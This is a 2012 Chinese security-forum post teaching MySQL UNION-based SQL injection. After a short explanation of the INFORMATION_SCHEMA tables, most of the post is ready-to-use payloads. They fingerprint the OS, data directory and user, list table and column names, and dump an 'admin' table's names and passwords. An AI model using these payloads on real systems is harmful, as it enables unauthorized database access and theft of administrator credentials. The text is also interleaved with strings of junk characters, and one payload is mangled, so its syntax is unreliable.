找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1962|回复: 0
打印 上一主题 下一主题

mysql常规注入

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:48:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本文介绍MYSQL盲注的一些语句和方法
( M/ }. c0 p8 l6 F$ v$ \  I0 |
# B1 C) O& q# {2 p学习盲注前先了解下 IFORMATION_SCHEMA 库
" a# _: p5 _5 F$ a0 O/ S0 N# v, [4 u! H$ Z
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有  e1 q1 ~6 q. `* n0 M
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
& y0 ^7 w: X5 q" z1.得到所有数据库名:
2 Y# }  |& l+ L- E5 u0 d|SCHEMATA ->存储数据库名的表
- E9 Z1 o+ x! H* z3 t; _, w+ `|---字段:SCHEMA_NAME ->数据库名称9 F0 Q: x2 e" R* J. `. s7 H
* X7 U/ X; i4 z7 a$ e4 y' f, k( D8 _
|TABLES ->存储表名7 x/ K2 S7 Q0 ~; |6 b. f. Y  [
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
+ L% E3 m% u3 U( ]6 N/ D|---字段:TABLE_NAME ->存储表的表名
# ]+ b8 x3 n! r0 s5 p3 m
3 E. }& B  p0 J- i' J|COLUMNS ->存储的字段名表8 u7 D, ?6 M3 I5 w8 L( ]2 T! p
|---字段:TABLE_SCHEMA ->该字段所属数据库名
) Z9 A9 @# O7 v3 B1 W" V|---字段:TABLE_NAME ->存储所属表的名称
3 O) v' p9 K- L7 p8 `& @  W" Y+ l+ x' F& b2 n; G" r, N
|---字段:COLUMN_NAME ->该字段的名称
: E8 }( n7 D$ D' O
5 r7 Z9 i& R; J+ j7 r1 ~$ F2 b , o) k* u) e9 `: h6 Y( e1 Q
$ \  j* }8 @& D9 e2 }2 g5 l; @: I
###########################################################################
, m4 I# Y- f% W* G; n8 w
! ~1 v5 ^; m: T0x001 获取系统信息:5 e/ R& t" h( f- ]6 R  [/ c

6 m0 ~9 I0 i' ]union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*2 J" k+ N  {* x1 `! t. S+ B

8 m7 ]1 b; \* ?/*
! s7 V: _% g* f% z- b( v* |) q
* j) X4 X/ P1 f: H: {@@global.version_compile_os 获取系统版本
2 @, p" G0 f2 c. y" @( W# z
9 W2 O/ B8 g9 G0 P' K# ~6 E2 J@@datadir 数据库路径* ~, y$ ]6 T+ w- Q3 v- O
database() 当前数据库名称% u9 q+ s2 L" @7 w* h: p
0x3c62723e 换行HEX值
. h+ p' _6 ]% V% F4 j3 {; n5 M8 s: x. ^: a4 U4 f& o. j* D8 t! g
*/
6 F4 C9 B( q& @1 ^# D. s, q9 g3 }/ Q/ `: E7 |
8 X( J" H! U/ y2 U5 K3 D4 [

! g  z9 }" S. a; O  F; _& Y######################################################################
" g* }9 u) G' F5 O  f( m1 b8 u; U; Z. g. a2 U3 X7 `& B  N
0x002 获取表名' {+ v% a/ d1 N  }( Y

$ X7 j% N8 ~/ Gunion select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*  P' J4 F. y- _( B/ I

: x/ |4 y: y' \2 W5 D
2 W$ }- _. T5 E, Q
. p7 V# ^1 p! ^) B4 H/** j+ n' g6 }( c& `/ j* v

( b4 O9 M' c8 f! I% M0x67617264656e 为当前数据库名7 M) q% x6 V8 [! i! a9 O

4 T1 N9 N4 o# X) o" t0 z2 @# O9 pgroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名
2 M. _" P2 N' f6 t! Q1 A1 ^6 m7 k; M/ |2 n7 p" W6 a0 d
*/
& w; K3 T0 {, [3 w0 q
. k3 l1 M2 r- F######################################################################% h& [% y; {( _' y/ C1 F7 q

) j2 V" P; T( e! Q' v& a) h1 c" H9 G
0 O: v( I2 J& N9 @/ M3 p* U! ]
8 A2 }& ]5 W( v0x003 获取字段
1 Z0 f: |6 q. @. m, [6 `2 d, A: K3 o: [. x4 i2 g3 T4 Z
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
, Y( }" U: r7 P& i2 y7 h5 V& G( E% j" ]3 P
/*5 \! r$ s! P2 ?, D# g9 s
# n4 Y. ?! A7 W0 }1 ?
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段- O: Q, G; Z* b! d
! K, |4 s4 f1 c! A2 X
0x61646d696e ->选择一个表
7 `/ A! l# P# }' K8 Z, h/ U1 e: I# q5 ?
0x67617264656e ->数据库名
' j; }! d0 c% e/ t
2 V  e. h2 n( M# V8 X6 s: v*/, O6 A( @) ^* o  V) `5 \" |+ P

& A5 \+ u0 }: A4 ^; m) ~% Y#####################################################################
8 B6 ~/ v% R* P5 ]- N$ W: ]9 x0 J3 B
0 l0 T) e4 `9 |* A8 I6 G 7 ~6 T" X& }. s
- x! F4 g, E) u  a
0x004 获取数据2 Q1 E% A! \4 M$ S  F
1 S- P% P/ r$ M$ H% {1 \5 `
union select 1,2,3
6 U' b% X# J3 t/ [  K  e8 o  R; x,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin2 F1 y8 `, c- q% T* F

  I$ R3 Z6 H5 w& }7 Z! T: }1 z" wunion select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
( n1 L1 x8 g) y/ j
9 w3 `( h/ r/ @' l# L# F
! v% p: W5 i7 a9 A5 C! v; S/ k+ u1 E0 S
/*
/ o) J) |. L  k+ u# q  g& a
5 D. t  X4 r& n: g0x3c62723e 换行符号HEX编码# b- u  M- f5 |! ?) y7 V& h' s
4 v% B+ ^' e3 f, E; j
group_concat 同时获得该字段所有数据' I4 W0 I" g$ B* ~
4 H' E  w8 U' u3 s4 G6 G3 M
*/
& F" [7 L. E& N  f+ L5 O# K2 E4 b
8 n% z% O; s5 s  g2 C. [
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表